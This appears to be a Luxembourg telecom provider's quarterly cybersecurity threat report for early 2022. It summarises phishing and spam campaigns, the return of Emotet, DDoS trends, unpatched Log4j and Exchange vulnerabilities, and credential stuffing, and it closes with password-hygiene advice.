Back to articles

Cybersecurity weather forecast – 1st quarter 2022

19 May 2022

Figures

General information

The number of incidents in the first quarter of 2022 is up by 37% compared with the previous quarter. Phishing attacks are still the preferred initial means of access for attackers. Emotet came back with a bang in February, confirming that this malware program is back in circulation despite being dismantled in 2021.

Phishing

The period included an incident in March during which several people were targeted by phishing attacks impersonating the eboo service. What makes this campaign novel is the fact that it was spread exclusively via text message (see image below). Through this channel, link shorteners (cutt.ly, bit.ly, etc.) are still widely used for phishing purposes. These shorteners make the text messages sent shorter but also redirect victims to other, more dubious links.


The malicious actors’ aim was to steal the victims' means of authentication by spoofing the original “service” page. Access to these accounts allows malicious actors to perpetrate fraud without the victims' knowledge.

Phishing campaigns aimed at stealing victims' bank account details remain prevalent. Financial motivation and the desire for a quick return on investment are the reasons behind these attacks.

We have also seen the POST brand being used to try to steal bank card details by claiming that a victim needs to make an extra payment to receive a package.

Finally, when the victims are companies, malicious actors have been able to use their ingenuity to steal account identifiers. The Microsoft Office 365 and Outlook authentication pages were spoofed for the purposes of stealing professional users’ credentials, whether for access to the company’s Webmail or its Active Directory accounts. These campaigns are mainly conducted to gain initial access to the target company with a view to achieving the desired objective (theft of data/confidential documents, fraud, reuse of resources, etc.).

During the period, we were able to compile the following ranking of malicious actors’ preferred hosting providers for Q1 2022:

  1. CloudFlare Inc. (+3)
  2. Google LLC (-1)
  3. Microsoft Corporation (+4)
  4. Dedibox Customer IP Range (New)
  5. Amazon Technologies Inc. (=)
  6. Namecheap Inc. (-4)
  7. DigitalOcean LLC (New)
  8. OVH SAS (=)
  9. Domain Names Registrar Reg.ru Ltd (New)
  10. Bitly Inc (-7)

Spam

We have seen spam campaigns targeting Luxembourg mobile numbers with the special feature of using the iMessage service (Apple) to spread unwanted content. The dissemination of these messages therefore bypasses the traditional mobile networks. These messages promised payment if the victim called a foreign number. This is a classic case of an attempted Wangiri-like phone scam without using an initial call to pique the curiosity of potential victims.

Malware

Emotet

After the dismantling and seizure of Emotet command servers during 2021, we witnessed a reappearance of this malicious code in the first quarter of 2022 in Luxembourg.
This malicious code is sometimes used as a malware loader for other cybercriminals. It has the ability to change its signature, making it harder to detect.

We have seen this malware being sent as an attachment from a legitimate e-mail address spoofed by the attacker. The e-mail address may, for example, come from an address book stolen from a machine belonging to a third party that was the subject of a previous attack.

In order to increase its credibility, malicious actors add an e-mail exchange to the thread. This process leads the victim to believe that they have had an exchange with a legitimate interlocutor.

In addition, in order to bypass antivirus software, the malicious code is compressed and password protected.

The malicious file is presented as an anti-virus, which is the attacker's chosen means of reducing the target's vigilance.

When it is executed, protection mechanisms on Microsoft Excel are disabled, allowing scripts to be deployed and malicious actors to take control of the machine.

If you find yourself in this situation, we recommend that you contact cybersecurity experts. POST CyberForce can help you to deal with such circumstances.

DoS/DDoS

The number of attacks remained stable over the period. However, the volume of attacks decreased to 1.1 Gbps.
The techniques used are:

  • Global UDP fragment abnormal
  • ACK flood

Masquerade attacks

During the period, we saw Facebook being used to publish fake POST Luxembourg pages.
These pages contained links to a web page asking you to enter your mobile number in order to access Esport-type competitions. These pages were not related to POST Esports Masters. Again, these are scams designed to trick people into subscribing to premium-rate text messages without the knowledge of potential victims.

Vulnerabilities

Log4j

Disclosed in December 2021, the Log4j vulnerability is still being used in attempted attacks this year. It remains the most critical vulnerability of recent years in terms of the scale of the attack surface and how easy it is to exploit.
We have seen a lot of scanning activity in recent months. Despite warnings about what to do about this vulnerability, we found that some servers remained vulnerable. If you have not already done so, we strongly advise you to take the necessary measures to protect yourself against this vulnerability (Link to the CIRCL website concerning this vulnerability https://www.circl.lu/pub/tr-65/).

Microsoft Exchange Server

At the beginning of 2022, mail servers with the Microsoft Exchange Server application exposed on the internet remained vulnerable due to a lack of patching. Patches had not been applied early in 2022. Moreover, the criticality associated with these vulnerabilities is particularly high. These servers could thus be vulnerable to privilege escalation or remote code execution.
The following is a list of vulnerabilities that could be exploited by a malicious actor:

  • CVE-2021-26427 (Critical)
  • CVE-2021-42321
  • CVE-2021-41348
  • CVE-2021-31196
  • CVE-2021-31206
  • CVE-2021-33768
  • CVE-2021-31195
  • CVE-2021-31198
  • CVE-2021-31207
  • CVE-2021-31209

We strongly recommend that you apply the necessary patches to protect your servers and your information assets, in the form of e-mails.

Intrusions

We have witnessed several attempts at intrusion during the period using “credential stuffing” techniques. The threat is greater than ever with regard to this process using a dictionary of credentials leaked in previous attacks. These malicious actors exploit the potential weaknesses of users using the same credentials on multiple services.
Here are some tips on how to avoid this kind of situation:

  • Use different passwords for each personal and business account.
  • Avoid basing your passwords on personal information that is easy to find online (social media, blog, etc.).
  • The password must contain a minimum of 12 characters mixing upper and lower case letters, numbers and special characters. You can also use a secret phrase.
  • You must be the only person who knows the password. Never keep a default password.
  • Enable two-factor authentication if you have the option.
  • Finally, do not hesitate to change your password at the slightest suspicion.

These precautions are there to protect you. Applying them is vital. Reusing the same password on several sites and using passwords that are too simple increase the risk of your access being compromised.

Our experts answer your questions

Do you have any questions about an article? Do you need help solving your IT issues?

Other articles in the category Cybersecurity

DDoS attacks in Luxembourg in 2023

Discover the statistics of DDoS attacks detected in Luxembourg in 2023 by POST Cyberforce.

Read this article

Published on

15 February 2023

DDoS attacks in Luxembourg in 2022

Discover the statistics of DDoS attacks detected in Luxembourg in 2022 by POST Cyberforce.

Read this article

Published on

11 October 2022

Cybersecurity: peace of mind with the POST SOC

Using a Security Operations Centre (SOC) allows organisations to constantly monitor activity on their IT systems so as to take quick and effective action in the event of an attack or anomaly.

Read this article

Published on

12 July 2022